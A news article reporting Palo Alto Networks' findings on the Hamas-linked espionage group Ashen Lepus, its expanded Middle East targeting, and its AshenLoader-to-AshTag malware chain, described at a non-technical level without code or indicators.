Palo Alto Networks has uncovered new details about an extensive espionage campaign run by Ashen Lepus, a Hamas‑linked cyber group that has maintained persistent operations against governmental and diplomatic bodies across the Middle East. According to the company, the group not only continued its activity throughout the Israel-Hamas conflict but intensified its efforts even after the October 2025 Gaza ceasefire, deploying newly developed malware and engaging directly within compromised networks.
Researchers reported that Ashen Lepus, active since 2018, has expanded its traditional target set beyond the Palestinian Authority, Egypt, and Jordan, now reaching entities in Oman and Morocco and showing new interest in Turkey. Despite this broader geographic reach, many of the lures used in phishing attempts continue to revolve around Middle East geopolitical issues, particularly those involving the Palestinian Territories. Recent decoys included documents referencing Turkish defense policy, alleged Hamas training in Syria, and discussions surrounding Palestinian political developments.
The group’s infection chain remains multi‑stage but has undergone significant upgrades. Ashen Lepus continues to distribute a benign‑looking PDF that directs targets to download a RAR archive containing a disguised binary file, a malicious loader, and a secondary decoy document. When opened, the binary triggers DLL side‑loading that launches updated versions of the group’s loader, known as AshenLoader, which displays the decoy document while running malicious processes in the background.
Palo Alto Networks identified a notable shift in the group’s command‑and‑control infrastructure. Rather than relying on attacker‑owned domains, Ashen Lepus now registers API and authentication‑themed subdomains under legitimate‑looking hostnames, a tactic that helps blend malicious traffic into regular internet activity. These domains include medical and technology‑related names, and many of the servers are geofenced to prevent automated analysis systems from accessing them. Secondary payloads are embedded within HTML tags, and the servers validate geolocation and unique User‑Agent strings before responding.
At the heart of the campaign is a new malware suite named AshTag, described as a modular .NET-based backdoor capable of file exfiltration, downloading additional content, and executing further modules entirely in memory. The infection chain progresses through the execution of AshenLoader, the retrieval of a stager dubbed AshenStager, and the loading of AshTag through a component known as AshenOrchestrator. The orchestrator decodes modules hidden within webpage content and can activate features such as system fingerprinting, persistence, file management, and screen capture.
Investigators reported that Ashen Lepus conducted hands‑on activity after the initial compromise. Attackers staged selected documents in public folders and exfiltrated the data using Rclone, a legitimate file transfer tool increasingly adopted by malicious actors to disguise their activity. The stolen material was taken directly from victims’ mail accounts and appeared to focus on diplomatic documents, consistent with the group’s long‑standing intelligence collection objectives.
Throughout 2025, the group refined its malware loaders, adopting AES‑CTR‑256 encryption, expanding system‑fingerprinting capabilities, and repeatedly adjusting the structure of its command‑and‑control URLs. While these changes do not radically alter functionality, they improve the group’s ability to evade static detection tools.
Palo Alto Networks has released indicators of compromise, including malware hashes, encryption keys, scheduled task names, and associated C2 domains. The company warns that Ashen Lepus is likely to continue adapting its toolset and expanding its targeting as it pursues intelligence related to regional geopolitical developments, noting that the group remains unusually active compared with others operating in the same sphere.
The company shared its findings with the Cyber Threat Alliance and advised governmental and diplomatic organizations throughout the Middle East to remain vigilant amid the actor’s ongoing campaigns.